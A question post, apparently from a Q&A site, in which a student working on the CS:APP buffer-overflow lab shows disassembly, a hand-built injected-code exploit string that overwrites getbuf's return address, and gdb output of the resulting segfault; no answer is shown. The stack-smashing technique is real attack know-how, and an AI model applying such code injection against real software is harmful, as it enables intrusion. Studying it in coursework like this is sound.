Segmentation fault when exploit string overwrites the return pointer with the starting address on stack

1.4k views Asked by At

I'm doing the csapp buflab level 2. In this assignment I'm asked to input an exploit string using the getbuf() Mine looks like.

08048fe0 <getbuf>:
 8048fe0:   55                      push   %ebp
 8048fe1:   89 e5                   mov    %esp,%ebp
 8048fe3:   83 ec 18                sub    $0x18,%esp
 8048fe6:   8d 45 f4                lea    -0xc(%ebp),%eax
 8048fe9:   89 04 24                mov    %eax,(%esp)
 8048fec:   e8 6f fe ff ff          call   8048e60 <Gets>
 8048ff1:   b8 01 00 00 00          mov    $0x1,%eax
 8048ff6:   c9                      leave  
 8048ff7:   c3                      ret    
 8048ff8:   90                      nop
 8048ff9:   8d b4 26 00 00 00 00    lea    0x0(%esi,%eiz,1),%esi

And the bang() checks the global_value,

void bang(int val)
{
    entry_check(2); /* Make sure entered this function properly */
    if (global_value == cookie) {
        printf("Bang!: You set global_value to 0x%x\n", global_value);
        validate(2);
    } else
    printf("Misfire: global_value = 0x%x\n", global_value);
    exit(0);
    }
}

So I find the address:

0804a1dc <global_value>:
804a1dc:     00 00 00 00

And my exploit string looks like:

00000000 <.text>:
   0:     c7 05 dc a1 04 08 6c      movl   $0x6355476c,0x804a1dc
   7:     47 55 63 
   a:     68 60 8d 04 08            push   $0x8048d60
   f:     c3                        ret  

Then I search the address of the input string(it should be on the stack)

Breakpoint 1, 0x08048fe6 in getbuf ()
(gdb) print /x ($ebp-0xc)
$1 = 0xffffb3ac
(gdb) 

So my input string is c7 05 dc a1 04 08 6c 47 55 63 68 60 8d 04 08 c3 ac b3 ff ff

However, I still get the result of segmentation fault. The result shows that I entered the right address, and I successfully passed level 0&1 using same strategy, I don't understand where I did wrong...

Reading symbols from bufbomb...done.
(gdb) break *getbuf+17
Breakpoint 1 at 0x8048ff1
(gdb) run -t PB12000359 < fire_hex_raw 
Starting program: /home/xgwang/Workspace/csapp_exp/Lab3 [buf Lab]/workspace/bufbomb -t PB12000359 < fire_hex_raw
Team: PB12000359
Cookie: 0x6355476c

Breakpoint 1, 0x08048ff1 in getbuf ()
(gdb) x/10x $esp
0xffffb3a0: 0xffffb3ac  0x555ac728  0x555e819b  0xa1dc05c7
0xffffb3b0: 0x476c0804  0x60686355  0xc308048d  0xffffb3ac
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xffffb3ac in ?? ()
(gdb) 

This is the succussful version of level 0(where I was asked to simply overwrite the return address with another function's starting address), notice that the addresses are in the same place, but level 2 just failed.

Reading symbols from bufbomb...done.
(gdb) break *getbuf+17
Breakpoint 1 at 0x8048ff1
(gdb) run -t PB12000359 < smoke_raw 
Starting program: /home/xgwang/Workspace/csapp_exp/Lab3 [buf Lab]/workspace/bufbomb -t PB12000359 < smoke_raw
Team: PB12000359
Cookie: 0x6355476c

Breakpoint 1, 0x08048ff1 in getbuf ()
(gdb) x/10x $esp
0xffffb3a0: 0xffffb3ac  0x555ac728  0x555e819b  0x00000000
0xffffb3b0: 0x00000000  0x00000000  0x00000000  0x08048e20
0xffffb3c0: 0x00000000  0x08049ac7
(gdb) cont
Continuing.
Type string:Smoke!: You called smoke()

Thanks for any advice.

0

There are 0 answers